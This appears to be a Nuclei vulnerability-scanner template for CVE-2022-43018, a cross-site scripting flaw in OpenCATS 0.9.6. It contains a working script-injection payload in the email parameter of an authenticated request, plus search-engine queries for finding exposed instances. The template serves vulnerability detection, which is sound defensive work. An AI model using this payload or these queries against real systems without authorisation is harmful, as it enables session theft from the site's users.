id: CVE-2022-43018

info:
  name: OpenCATS 0.9.6 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Authenticated attackers can inject malicious JavaScript through the email parameter in the Check Email function to steal OpenCATS user session cookies and recruitment data.
  remediation: |
    Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor.
  reference:
    - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-43018
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-43018
    cwe-id: CWE-79
    epss-score: 0.0245
    epss-percentile: 0.85479
    cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: opencats
    product: opencats
    shodan-query:
      - title:"OpenCATS"
      - http.title:"opencats"
    fofa-query: title="opencats"
    google-query: intitle:"opencats"
  tags: cve,cve2022,xss,opencats,authenticated,vuln

http:
  - raw:
      - |
        POST /index.php?m=login&a=attemptLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}
      - |
        GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>:0'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100be16ee25cfbdde4512dfd2e51b51a84c1434ab36567970de91af372ac5d6672d022100ddcd48d31dacda83b8ad60d5b21fd737c98860d958ec3d97bfa2df4fbbdfbe23:922c64590222798bb761d5b6d8e72950